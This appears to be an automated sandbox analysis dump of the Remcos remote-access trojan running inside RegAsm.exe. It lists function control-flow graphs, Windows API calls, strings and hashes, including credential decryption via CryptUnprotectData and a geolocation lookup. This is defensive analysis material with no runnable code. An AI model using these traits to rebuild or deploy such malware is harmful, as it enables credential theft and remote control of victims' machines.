                                                                                                                            • Opcode ID: 4ae1af847c86cfc22abb557c668e09cb8c114ad66c721bf11deb43d1aacda498
                                                                                                                            • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                                                                            • Opcode Fuzzy Hash: 4ae1af847c86cfc22abb557c668e09cb8c114ad66c721bf11deb43d1aacda498
                                                                                                                            • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1607 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1614 10001177-1000119e lstrlenW FindFirstFileW 1607->1614 1615 10001168-10001172 lstrlenW 1607->1615 1616 100011a0-100011a8 1614->1616 1617 100011e1-100011e9 1614->1617 1615->1614 1618 100011c7-100011d8 FindNextFileW 1616->1618 1619 100011aa-100011c4 call 10001000 1616->1619 1618->1616 1621 100011da-100011db FindClose 1618->1621 1619->1618 1621->1617
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1083526818-0
                                                                                                                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1623 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1628 41b3c5-41b3e6 InternetReadFile 1623->1628 1629 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1628->1629 1630 41b40c-41b40f 1628->1630 1629->1630 1631 41b411-41b413 1630->1631 1632 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1630->1632 1631->1628 1631->1632 1636 41b427-41b431 1632->1636
                                                                                                                            APIs
                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                                                                            Strings
                                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                                            • API String ID: 3121278467-91888290
                                                                                                                            • Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                                                                                            • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                                                                            • Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                                                                                            • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                                                                            • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                                                                                                            • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                                                                                              • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                                                                                              • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                                                                              • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3950776272-0
                                                                                                                            • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                                                                            • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                                                                            • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                                                                            • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                                                                              • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                                                                                                              • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                                                                            • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                            • String ID: 5.0.0 Pro$override$pth_unenc
                                                                                                                            • API String ID: 2281282204-3992771774
                                                                                                                            • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                                                                            • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                                                                            • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                                                                            • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406AA3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressCryptDataLibraryLoadProcUnprotect
                                                                                                                            • String ID: CryptUnprotectData$crypt32
                                                                                                                            • API String ID: 1087783672-2380590389
                                                                                                                            • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                                                            • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                                                                            • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                                                            • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00909780), ref: 00433849
                                                                                                                            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1815803762-0
                                                                                                                            • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                            • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                                                                            • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                            • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                                                                            APIs
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                                                                                            Strings
                                                                                                                            • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileSystem
                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                            • API String ID: 2086374402-595813830
                                                                                                                            • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                                                                            • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                                                                                            • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                                                                            • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                                                                                            APIs
                                                                                                                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                                                                                            • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Name$ComputerUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4229901323-0
                                                                                                                            • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                                                                            • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                                                                            • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                                                                            • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                                                            • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                                                                            • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                                                            • Instruction Fuzzy Hash:

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 89 40ec13-40ec1a 79->89 90 40ec0c-40ec0e 79->90 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 94 40ec1c 89->94 95 40ec1e-40ec2a call 41b2c3 89->95 93 40eef1 90->93 93->49 94->95 104 40ec33-40ec37 95->104 105 40ec2c-40ec2e 95->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 107 40ec76-40ec89 call 401e65 call 401fab 104->107 108 40ec39 call 407716 104->108 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->127 128 40ec8b call 407755 107->128 117 40ec3e-40ec40 108->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->107 141 40ec61-40ec67 121->141 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->107 144 40ec69-40ec6f 141->144 144->107 147 40ec71 call 407260 144->147 147->107 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 204 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->204 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 190 40ee1e-40ee42 call 40247c call 434798 183->190 184->190 211 40ee51 190->211 212 40ee44-40ee4f call 436e90 190->212 204->177 218 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->218 212->218 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 218->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 290 40efc3-40efda call 41cd9b CreateThread 286->290 291 40efe0-40efe2 287->291 292 40efe4 287->292 288->234 306 40eeef 288->306 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 291->290 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 367 40f1cc-40f1df call 401e65 call 401fab 357->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 401 40f240-40f241 SetProcessDEPPolicy 380->401 402 40f243-40f256 CreateThread 380->402 401->402 406 40f264-40f26b 402->406 407 40f258-40f262 CreateThread 402->407 410 40f279-40f280 406->410 411 40f26d-40f277 CreateThread 406->411 407->406 412 40f282-40f285 410->412 413 40f28e 410->413 411->410 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                                                                                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                                                                                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                                                                                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                                                                                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                                                                                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                                                                                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                                                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                                                                                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                                                                                              • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                            • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-43JG4A$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                            • API String ID: 2830904901-1651611732
                                                                                                                            • Opcode ID: a49d8c8897ba861e5c571a9b2ae22576838358ad5d7890ed632cc896768278d7
                                                                                                                            • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                                                                            • Opcode Fuzzy Hash: a49d8c8897ba861e5c571a9b2ae22576838358ad5d7890ed632cc896768278d7
                                                                                                                            • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
